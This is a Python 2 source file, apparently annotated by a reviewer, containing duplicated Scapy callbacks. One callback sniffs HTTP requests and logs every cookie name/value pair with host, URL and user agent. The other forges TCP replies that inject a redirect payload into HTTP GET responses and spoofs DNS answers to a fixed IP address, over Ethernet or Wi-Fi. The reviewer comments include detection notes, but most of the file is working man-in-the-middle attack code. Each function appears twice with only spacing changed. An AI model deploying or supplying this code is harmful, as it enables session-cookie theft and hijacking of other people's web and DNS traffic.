def process(pkt):
    """Sniffer callback: record HTTP request headers and cookies in the DB.

    For a TCP segment whose payload begins with ``GET `` or ``POST ``, the
    Host, User-Agent, destination URL and Cookie values are extracted from
    the raw payload via ``helper`` and one ``db_insert`` row is written per
    ``name=value`` pair found in the Cookie header.  Nothing is written when
    the request carries no Cookie header.

    NOTE(review): the indentation below was reconstructed from a collapsed
    one-line listing; it is the most plausible reading of the block
    structure.  Every value stored here comes straight from untrusted
    network bytes, so ``db_insert`` (defined outside this view) must bind
    them as query parameters rather than interpolate them into SQL --
    confirm against its definition.  This is Python 2 era code
    (``str`` payloads, ``!= None`` comparisons).
    """
    if pkt.haslayer(TCP):
        if pkt.haslayer(Raw):
            tcpdata = pkt.getlayer(Raw).load
            # Only a request that starts at the beginning of this segment is
            # seen; headers spanning several segments are partly missed.
            if tcpdata.startswith("POST ") or tcpdata.startswith("GET "):
                # Source MAC is optional: the placeholder is kept when the
                # capture has no Ethernet header.
                ether_src = 'None_observed'
                if (pkt.haslayer(Ether)):
                    ether_src = pkt.getlayer(Ether).src
                cookie = helper.getcookie(tcpdata)
                host = helper.gethost(tcpdata)
                useragent = helper.getuseragent(tcpdata)
                address = helper.getdsturl(tcpdata)
                ip_src = pkt.getlayer(IP).src
                # The helper getters appear to return None or a sequence of
                # string fragments (hence ''.join) -- TODO confirm in helper.
                # ``!= None`` should be ``is not None`` (PEP 8); left as-is.
                if cookie != None:
                    cookie = ''.join(cookie)
                else:
                    cookie = ''
                if host != None:
                    host = ''.join(host)
                else:
                    host = ''
                if useragent != None:
                    useragent = ''.join(useragent)
                else:
                    # BUG(review): typo -- this assigns ``useragnet``, so
                    # ``useragent`` stays None and None reaches db_insert.
                    useragnet = ''
                if address != None:
                    address = ''.join(address)
                else:
                    address = ''
                if cookie != '':
                    # Naive split: a ';' or '=' inside a quoted cookie value
                    # breaks the pair.  For a fragment with no '=' at all,
                    # find() returns -1, so ``name`` loses its last character
                    # and ``val`` becomes the whole fragment.
                    cookies = cookie.split(';')
                    for name_val in cookies:
                        eq = name_val.find('=')
                        name = name_val[0:eq].strip()
                        val = name_val[eq + 1:].strip()
                        db_insert(ether_src, host, name, val, address, useragent, ip_src)
def process(pkt):
    """Sniffer callback: record HTTP request headers and cookies in the DB.

    Duplicate of the ``process`` definition above with different intra-line
    spacing; the tokens are identical.  For a TCP segment whose payload
    begins with ``GET `` or ``POST ``, Host, User-Agent, destination URL and
    Cookie are pulled from the raw payload via ``helper`` and one
    ``db_insert`` row is written per ``name=value`` cookie pair.

    NOTE(review): indentation reconstructed from a collapsed one-line
    listing.  All stored fields originate from untrusted network bytes;
    ``db_insert`` (not in view) must use parameter binding -- confirm.
    """
    if pkt.haslayer(TCP):
        if pkt.haslayer(Raw):
            tcpdata = pkt.getlayer(Raw).load
            # Requests whose first bytes are not in this segment are missed.
            if tcpdata.startswith("POST ") or tcpdata.startswith("GET "):
                # Placeholder kept when no Ethernet header is present.
                ether_src='None_observed'
                if(pkt.haslayer(Ether)):
                    ether_src=pkt.getlayer(Ether).src
                cookie=helper.getcookie(tcpdata)
                host=helper.gethost(tcpdata)
                useragent=helper.getuseragent(tcpdata)
                address=helper.getdsturl(tcpdata)
                ip_src=pkt.getlayer(IP).src
                # Getters appear to return None or a sequence of fragments
                # (hence ''.join) -- TODO confirm in helper.
                # ``!= None`` should be ``is not None``; left unchanged.
                if cookie != None:
                    cookie=''.join(cookie)
                else:
                    cookie=''
                if host != None:
                    host=''.join(host)
                else:
                    host=''
                if useragent != None:
                    useragent=''.join(useragent)
                else:
                    # BUG(review): typo ``useragnet`` -- ``useragent`` stays
                    # None on this path and None is what db_insert receives.
                    useragnet=''
                if address != None:
                    address=''.join(address)
                else:
                    address=''
                if cookie != '':
                    # Naive ';' split; a fragment without '=' gives eq == -1,
                    # so ``name`` drops its last character and ``val`` is the
                    # whole fragment.
                    cookies = cookie.split(';')
                    for name_val in cookies:
                        eq = name_val.find('=')
                        name = name_val[0:eq].strip()
                        val = name_val[eq+1:].strip()
                        db_insert(ether_src,host,name,val,address,useragent,ip_src)
def pkt_callback(pkt):
    """Scapy sniff callback that answers observed traffic with forged replies.

    What this function visibly does:

    * Builds ``l2``/``l3``/``l4`` with source and destination swapped
      relative to the captured packet, i.e. the forged frame carries the
      addresses of the host the sniffed client was talking to.
    * TCP segment with flags 24 (PSH|ACK) or 16 (ACK) carrying an HTTP
      ``GET ``: unless the URL contains one of the hard-coded substrings,
      sends a PSH/ACK whose payload is the module-level ``redirpkt``,
      followed by a FIN/ACK.
    * UDP/DNS query (``qr == 0``): sends an answer with ``ttl=10`` and the
      fixed ``rdata`` below for whatever name was asked.

    Module globals used: ``scapy``, ``helper``, ``redirpkt``, ``interface``.
    This is Python 2 code (``print "inject success"`` is statement syntax),
    and the indentation was reconstructed from a collapsed listing.

    Detection notes: nothing here suppresses the genuine server response,
    so a network sensor should expect two replies to one request with
    conflicting content; the DNS answer stands out by its 10-second TTL and
    by disagreeing with authoritative data (DNSSEC validation rejects it).
    """
    # --- Layer 2: mirror the captured frame's addresses ---------------------
    if pkt.haslayer(scapy.Dot11):
        #print("got Wifi packet")
        # construct fake l2 for wifi packet
        # addr1/addr2 swapped, FCfield set to "from-DS" (direction bit of the
        # forged frame), then LLC/SNAP so an IP layer can follow.
        macl = pkt.getlayer(scapy.Dot11)
        l2 = scapy.RadioTap() / scapy.Dot11(
            addr1=macl.addr2, addr2=macl.addr1, addr3=macl.addr3,
            FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
    elif pkt.haslayer(scapy.Ether):
        #print("got Ethernet packet")
        # construct fake l2 for ethernet packet
        macl = pkt.getlayer(scapy.Ether)
        l2 = scapy.Ether(dst=macl.src, src=macl.dst)
    else:
        print("protocol neither ethernet nor wifi, skipping")
        return
    # --- Layer 3: swap IP src/dst -------------------------------------------
    if pkt.haslayer(scapy.IP):
        # construct fake l3
        ipl = pkt.getlayer(scapy.IP)
        l3 = scapy.IP(src=ipl.dst, dst=ipl.src)
    else:
        #print("this is not IP packet, skipping")
        return
    # --- Layer 4 and payload ------------------------------------------------
    if pkt.haslayer(scapy.TCP):
        #print("we have TCP packet")
        # construct fake layer 4 for TCP
        tcpl = pkt.getlayer(scapy.TCP)
        l4 = scapy.TCP(dport=tcpl.sport, sport=tcpl.dport)
        # Flags compared as integers: 2 = SYN, 16 = ACK, 24 = PSH|ACK,
        # 17 = FIN|ACK.  Any other combination falls through and returns None.
        if tcpl.flags == 2:
            # syn
            return
        elif tcpl.flags == 24 or tcpl.flags == 16:
            # psh ack
            if pkt.haslayer(scapy.Raw):
                #print("packet has some data")
                tcpdata = pkt.getlayer(scapy.Raw).load
                # Only a GET that begins at the start of this segment is
                # considered; POST and requests split across segments are not.
                if tcpdata.startswith("GET "):
                    #print("TCP data starts with GET")
                    dsturl = helper.getdsturl(tcpdata)
                    if dsturl is None:
                        return
                    print("IP: %s, DST URL: %s" % (pkt.getlayer(scapy.IP).src, dsturl))
                    # Substring exclusion list: a URL containing any of these
                    # is logged and left alone.  The message suggests the
                    # author reads such a URL as an earlier redirect having
                    # taken effect -- an inference, not shown by the code.
                    if dsturl.find('0x0a') != -1 or dsturl.find('85.17') != -1 or dsturl.find('twitter') != -1 or dsturl.find('facebook') != -1 or dsturl.find('vk.com') != -1 or dsturl.find('blogger') != -1 or dsturl.find('odnoklassniki') != -1:
                        # Python 2 print statement -- this line alone makes
                        # the module unimportable under Python 3.
                        print "inject success"
                        return
                    #credirpkt = redirpkt % {'url': "http://0x0a.net/" }
                    # ``redirpkt`` is a module-level string defined outside
                    # this view; the commented line shows it was once a
                    # template with a %(url)s slot.
                    credirpkt = redirpkt
                    # construct reply packet
                    # seq/ack are derived from the captured segment (seq = its
                    # ack, ack = its seq + payload length), i.e. the values a
                    # genuine server response to this GET would carry.
                    pktreply = l2 / l3 / l4
                    pktreply.getlayer(scapy.TCP).seq = tcpl.ack
                    pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
                    pktreply.getlayer(scapy.TCP).flags = "PA"
                    # construct fin packet
                    # Second segment: FIN/ACK whose seq starts right after the
                    # injected payload.
                    finpktreply = pktreply.copy()
                    finpktreply.getlayer(scapy.TCP).flags = "FA"
                    finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)
                    # add redir payload to reply packet
                    pktreply.getlayer(scapy.TCP).add_payload(credirpkt)
                    packetbasket = [pktreply, finpktreply]
                    # send reply packet
                    # Layer-2 send on the module-level ``interface``.
                    scapy.sendp(packetbasket, verbose=0, iface=interface)
                    print("Reply sent")
                    return
        elif tcpl.flags == 17:
            # fin ack
            return
    elif pkt.haslayer(scapy.UDP):
        # construct layer 4 for UDP
        udpl = pkt.getlayer(scapy.UDP)
        l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)
        if pkt.haslayer(scapy.DNS):
            #print("We got DNS packet")
            dnsl = pkt.getlayer(scapy.DNS)
            # qr == 0 marks a query.  The reply echoes the transaction id and
            # question section and carries one fixed A record; the constant
            # rdata and 10 s TTL are what make these answers visible in
            # resolver logs.
            if dnsl.qr == 0:
                print("We got DNS request packet: %s" % (dnsl.qd.qname))
                pktreply = l2 / l3 / l4 / scapy.DNS(
                    id=dnsl.id, qr=1, qd=dnsl.qd,
                    an=scapy.DNSRR(rrname=dnsl.qd.qname, ttl=10, rdata="85.17.93.121"))
                scapy.sendp([pktreply], verbose=0, iface=interface)
                print("Reply sent")
                return
    else:
        print("protocol not TCP or UDP, skipping")
        #pkt.show()
        return
def pkt_callback(pkt):
    """Scapy sniff callback that answers observed traffic with forged replies.

    Duplicate of the ``pkt_callback`` definition above with different
    intra-line spacing; the tokens are identical.  It swaps addresses at
    L2/L3/L4 relative to the captured packet, answers an HTTP ``GET `` on a
    PSH/ACK or ACK segment with the module-level ``redirpkt`` plus a FIN/ACK
    (unless the URL contains one of the hard-coded substrings), and answers
    a DNS query with a fixed A record (``ttl=10``).

    Module globals used: ``scapy``, ``helper``, ``redirpkt``, ``interface``.
    Python 2 code (``print "inject success"``); indentation reconstructed
    from a collapsed listing.

    Detection notes: the genuine server/resolver response is not suppressed,
    so two conflicting replies to one request are visible on the wire; the
    DNS answer has an unusually low TTL and fails DNSSEC validation.
    """
    # --- Layer 2 --------------------------------------------------------------
    if pkt.haslayer(scapy.Dot11):
        #print("got Wifi packet")
        # construct fake l2 for wifi packet
        # addr1/addr2 swapped, FCfield "from-DS", LLC/SNAP so IP can follow.
        macl = pkt.getlayer(scapy.Dot11)
        l2 = scapy.RadioTap() / scapy.Dot11(addr1 = macl.addr2, addr2 = macl.addr1, addr3 = macl.addr3, FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
    elif pkt.haslayer(scapy.Ether):
        #print("got Ethernet packet")
        # construct fake l2 for ethernet packet
        macl = pkt.getlayer(scapy.Ether)
        l2 = scapy.Ether(dst = macl.src, src = macl.dst)
    else:
        print("protocol neither ethernet nor wifi, skipping")
        return
    # --- Layer 3 --------------------------------------------------------------
    if pkt.haslayer(scapy.IP):
        # construct fake l3
        ipl = pkt.getlayer(scapy.IP)
        l3 = scapy.IP(src = ipl.dst, dst = ipl.src)
    else:
        #print("this is not IP packet, skipping")
        return
    # --- Layer 4 and payload --------------------------------------------------
    if pkt.haslayer(scapy.TCP):
        #print("we have TCP packet")
        # construct fake layer 4 for TCP
        tcpl = pkt.getlayer(scapy.TCP)
        l4 = scapy.TCP(dport = tcpl.sport, sport = tcpl.dport)
        # Integer flag values: 2 = SYN, 16 = ACK, 24 = PSH|ACK, 17 = FIN|ACK;
        # anything else falls through and returns None.
        if tcpl.flags == 2:
            # syn
            return
        elif tcpl.flags == 24 or tcpl.flags == 16:
            # psh ack
            if pkt.haslayer(scapy.Raw):
                #print("packet has some data")
                tcpdata = pkt.getlayer(scapy.Raw).load
                # Only a GET at the very start of this segment is handled.
                if tcpdata.startswith("GET "):
                    #print("TCP data starts with GET")
                    dsturl = helper.getdsturl(tcpdata)
                    if dsturl is None:
                        return
                    print("IP: %s, DST URL: %s" % (pkt.getlayer(scapy.IP).src, dsturl))
                    # Substring exclusion list: matching URLs are logged and
                    # left alone.  The message implies the author treats such
                    # a URL as a redirect that already landed -- an inference.
                    if dsturl.find('0x0a') != -1 or dsturl.find('85.17') != -1 or dsturl.find('twitter') != -1 or dsturl.find('facebook') != -1 or dsturl.find('vk.com') != -1 or dsturl.find('blogger') != -1 or dsturl.find('odnoklassniki') != -1:
                        # Python 2 print statement; breaks import on Python 3.
                        print "inject success"
                        return
                    #credirpkt = redirpkt % {'url': "http://0x0a.net/" }
                    # ``redirpkt`` is a module-level string not in view; the
                    # commented line shows it was once a %(url)s template.
                    credirpkt = redirpkt
                    # construct reply packet
                    # seq/ack come from the captured segment (seq = its ack,
                    # ack = its seq + payload length), the values a genuine
                    # server response to this GET would carry.
                    pktreply = l2 / l3 / l4
                    pktreply.getlayer(scapy.TCP).seq = tcpl.ack
                    pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
                    pktreply.getlayer(scapy.TCP).flags = "PA"
                    # construct fin packet
                    # FIN/ACK whose seq starts right after the injected payload.
                    finpktreply = pktreply.copy()
                    finpktreply.getlayer(scapy.TCP).flags = "FA"
                    finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)
                    # add redir payload to reply packet
                    pktreply.getlayer(scapy.TCP).add_payload(credirpkt)
                    packetbasket = [pktreply, finpktreply]
                    # send reply packet
                    # Layer-2 send on the module-level ``interface``.
                    scapy.sendp(packetbasket, verbose = 0, iface = interface)
                    print("Reply sent")
                    return
        elif tcpl.flags == 17:
            # fin ack
            return
    elif pkt.haslayer(scapy.UDP):
        # construct layer 4 for UDP
        udpl = pkt.getlayer(scapy.UDP)
        l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)
        if pkt.haslayer(scapy.DNS):
            #print("We got DNS packet")
            dnsl = pkt.getlayer(scapy.DNS)
            # qr == 0 is a query; the reply echoes id and question and adds
            # one fixed A record.  Constant rdata plus a 10 s TTL is the
            # signature to look for in resolver logs.
            if dnsl.qr == 0:
                print("We got DNS request packet: %s" % (dnsl.qd.qname))
                pktreply = l2 / l3 / l4 / scapy.DNS(id=dnsl.id, qr=1, qd=dnsl.qd, an=scapy.DNSRR(rrname=dnsl.qd.qname, ttl = 10, rdata="85.17.93.121"))
                scapy.sendp([pktreply], verbose = 0, iface = interface)
                print("Reply sent")
                return
    else:
        print("protocol not TCP or UDP, skipping")
        #pkt.show()
        return